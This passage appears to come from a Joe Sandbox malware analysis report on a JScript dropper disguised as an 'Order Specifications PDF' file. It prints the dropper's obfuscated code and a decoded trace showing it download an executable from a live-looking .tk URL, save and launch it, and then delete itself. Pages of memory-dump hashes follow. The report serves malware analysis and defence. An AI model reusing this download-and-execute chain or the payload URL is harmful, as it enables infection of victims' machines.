                                                                                                                                                                                                                                                                                                                                                    • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                                    165
                                                                                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                                                                                      166
                                                                                                                                                                                                                                                                                                                                                      Stream[_0x445216 ( 0xcd, '^pwq' ) ] ( ), Stream[_0x115fc7 ( 0x88 ) ] = 0x1, Stream[_0x445216 ( 0xf1, 'h2t$' ) ] ( Object['ResponseBody'] ), Stream[_0x115fc7 ( 0x90 ) ] = 0x0, Stream[_0x115fc7 ( 0x7c ) ] ( pOut, 0x2 ), Stream[_0x445216 ( 0xe8, 'zn0Y' ) ] ( ), new ActiveXObject ( _0x115fc7 ( 0x6e ) ) [_0x56566c ( 0x10d ) ] ( pOut, '', '', _0x155c25 ( 0x7d, 'vUkl' ), '1' ), new ActiveXObject ( _0x155c25 ( 0x77, _0x445216 ( 0xf5, 'J(3^' ) ) ) [_0x115fc7 ( 0x76 ) ] ( WScript[_0x56566c ( 0x106 ) ] );
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(205,"^pwq") ➔ "Open"
                                                                                                                                                                                                                                                                                                                                                      • Open() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(136) ➔ "Type"
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(241,"h2t$") ➔ "Write"
                                                                                                                                                                                                                                                                                                                                                      • Write() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(144) ➔ "Position"
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(124) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                                                                      • SaveToFile("C:\Users\engineer\AppData\Local\Temp\VNZVNCXKKJSF.exe",2) ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(232,"zn0Y") ➔ "Close"
                                                                                                                                                                                                                                                                                                                                                      • Close() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(110) ➔ "Shell.Application"
                                                                                                                                                                                                                                                                                                                                                      • _0x56566c(269) ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                                                                                      • _0x155c25(125,"vUkl") ➔ "open"
                                                                                                                                                                                                                                                                                                                                                      • ShellExecute("C:\Users\engineer\AppData\Local\Temp\VNZVNCXKKJSF.exe","","","open","1") ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      • _0x445216(245,"J(3^") ➔ "UEHS"
                                                                                                                                                                                                                                                                                                                                                      • _0x155c25(119,"UEHS") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                                                                      • _0x115fc7(118) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                                                      • _0x56566c(262) ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                                                                                      • DeleteFile("C:\Users\engineer\Desktop\Order Specifications PDF.js") ➔ undefined
                                                                                                                                                                                                                                                                                                                                                      Reset < >
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: k
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1164933156
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a2acfe275fe4ae5fc98489c2270c0b5bc341df9c4ec618926d016bdfbd6323e3
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b0f0f4939bd45d0e1681f96d0acd320712a38549c2500a3bb1be4dcbba050b1a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2acfe275fe4ae5fc98489c2270c0b5bc341df9c4ec618926d016bdfbd6323e3
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F826930A002198FDB64DF64D894BAEB7F2AF88304F1185A9D50AEB754DF34AD42CF91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a814ae080dd01611da15f9238d4ebdc12360e3d70c02a44e9cfafade534eab0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9e552b985f5c71937ea8c17e4c416bab9f144eeabf35305cfd71cffda3de858f
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a814ae080dd01611da15f9238d4ebdc12360e3d70c02a44e9cfafade534eab0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD426B34B00204DFDB15DFA4D8A4BAE77B6BF88308F148469E9069B3A4DB75ED45CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: adcd800e3167d2b6f28e20d533b9c9f6a1c284d4e9e8b5cfa76c033611a709eb
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 602037105a86756bee438ffa11a0c656dd8ad473971d52468ba7504245d9c6c6
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: adcd800e3167d2b6f28e20d533b9c9f6a1c284d4e9e8b5cfa76c033611a709eb
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5229D74B002059FDB14EBB4E854AAEB7F2EFC8204B15842AD906DB754DF35EC46CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 841c789f9c33063df04a543e6f57f96489cd0a7b89cd761d618c88d3158bdbc7
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 610e88b165437c3dd16126961ed74a9a201880894f40ba138c98f22f0bf8cc86
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 841c789f9c33063df04a543e6f57f96489cd0a7b89cd761d618c88d3158bdbc7
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A228C75B002149FDB24EBB8E8596AEB7F6AFC8200F11802AD906DB754EF34DD45CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c3b2ec2569ab528c50838b09e65da78b17740c1786e5567b63b87da246811c97
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 79f74099b532ac2f1b689bbd6d3605dba8daf711a10a9c964204b2c33222cd79
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3b2ec2569ab528c50838b09e65da78b17740c1786e5567b63b87da246811c97
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D127F30A00259DFDB15DFA4D858BEEBBF6EF88305F158469E906AB390DB31AC45CB50
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: D04l$Xc4l$Xc4l
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3191032078
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 708909f43032c9f2d7e77e6f406881b9c4a1818255a5d6ae8329954f17ea9183
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f2e59851e53dcfb2515dfa98f0684895b009a0bb20f1678681161a08f3f21ac9
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 708909f43032c9f2d7e77e6f406881b9c4a1818255a5d6ae8329954f17ea9183
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0C18474B042188FCB14EFB9E454AAEBBF6FF89214B55816AD905DB361DB30DC02CB61
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1666140645
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7e0ef564c79d81fceb7d886fdf7c31bda78f6ab920a470cdf45adc97c3d1985f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 718ebb4448fa19c010104d737354ca9b697d6f8a974c3a0ca7321e20f50f78fb
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e0ef564c79d81fceb7d886fdf7c31bda78f6ab920a470cdf45adc97c3d1985f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2227D30A006068FDB14EF64C894BA9B7F2FF84314F15C699D989AB755DB70ED85CB80
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: DK4l$DK4l
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2437688437
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4653d22151c69dd95d24c15f1744805a3988ceea9d0a4a89de6d3d51e2cdfba6
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d03f21abd9288f13596b01b5d7de15f9840fb6b175f1cf31fde32898e6c3994a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4653d22151c69dd95d24c15f1744805a3988ceea9d0a4a89de6d3d51e2cdfba6
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78224A34A00205CFCB69DFA4C5949AEB7F2FF88315B2588A9D9169B364CB35EC46CF50
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: @ k$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-969093136
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d74b77c73dfe4c44ac9f0533165e4ecd87f779591e8a10d94293d9e8374d9b70
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2095afb085930b1a8b4538f1a91a77aa2636a4c4265d6a64495bcf158a2b2cc6
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b77c73dfe4c44ac9f0533165e4ecd87f779591e8a10d94293d9e8374d9b70
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F18D31A04205DFEB16CF68C494AAEFBB2FF89314F1185A9D5069B365CB31ED41CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1666140645
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ca9f912ae9640502efed9bd1ad0d03543d50e7a68be50286eaabbd718187f3b8
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2324bfe91892353d10f21a61ffdfc4c1a177fec25d24575b572ec3ddc02d2f44
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca9f912ae9640502efed9bd1ad0d03543d50e7a68be50286eaabbd718187f3b8
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD813730A01609DFDB14DF64D4A4A9DB7F2FF89304F2185A8E906AB366DB74ED45CB80
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1666140645
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f50b12ae77eb6f751d34fe6dcea947f3728989ae646b64f3979b06c48a413a1f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d4438e461eb49603d78215886f2947aa5194c0352265c22ee4f2880272812712
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f50b12ae77eb6f751d34fe6dcea947f3728989ae646b64f3979b06c48a413a1f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A61E730A00209CFDB55EF64C494AAEB7B2FF88308F1089A9D5069F355DB75ED46CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: (j$(j
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3238734073
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b6ec226963d9b6bf5e6a42aac65d6c59003272909caac068d03e8922e590e357
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6d11c0fea276b7cb1a52a6a507d768738f8ceba3da4e3c488fa20cf03a3fe8c1
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6ec226963d9b6bf5e6a42aac65d6c59003272909caac068d03e8922e590e357
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6517F74B006058FCB94DF28C498AAEBBF2FF89714B1584A9D509CB361DB30ED05CB50
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1666140645
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4b96973884c801f6058e4f8448c78d433159df2809d149c5e88e42bcc1f91b78
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d39d7d48ef89602448d353c8a0346cd58c842d37cb47151fd5df6d57fabfd50
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b96973884c801f6058e4f8448c78d433159df2809d149c5e88e42bcc1f91b78
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC614A34A04204DFDB19DFA0C4A4A9DB7B2FF89359F118868D9069F3A9DB35ED85CB40
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: j$ j
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-4110318802
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6cea0028f70d5be24f06e0ecf2efb481443c2eef039683da343c74c52f83123f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2b746417eb53a203bef4c72a2ee7b54644d10b4484ae9232d4d29a86f1c137a4
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cea0028f70d5be24f06e0ecf2efb481443c2eef039683da343c74c52f83123f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA31C1757006108FCB98DB29D49496EBBE7EFCD22431544AADA0ACB761CF30EC02CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-396138195
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 818d3056aec015a5b1894dfaa14d712cdc7eab5d28178d5e55deb71c6332480e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 91a8923203a94726ab4880a5b2946acd3706ef0ff3f2b3cee4a1590cc65d0dc3
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 818d3056aec015a5b1894dfaa14d712cdc7eab5d28178d5e55deb71c6332480e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55E1F034A00609CFCB15DFA8C5A4A99B7F2BF88314F258599D956AB322DB70ED41CF90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ec860b096e2784950b9ad8fac8b1473b646a769ce49b71373735bcd4d72b2c0c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5ec177da4591d251fb6776c664d83a421b9d965e0b30ca671853c9300fe8c3d9
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec860b096e2784950b9ad8fac8b1473b646a769ce49b71373735bcd4d72b2c0c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52D1F378A00219CFCB15CF99C594A9EBBF2BF48314F258599E806AB365D770ED42CF90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: L1j
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3909831282
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 243c0e1979203dcf8d626b5fa621f71a4d8df2681c37cb6a14cd87f8adb9afd1
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a3e07ffd5d151c453c54b3b883bef477c13f42f3098117a5cb8ee143b1e3f0bf
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 243c0e1979203dcf8d626b5fa621f71a4d8df2681c37cb6a14cd87f8adb9afd1
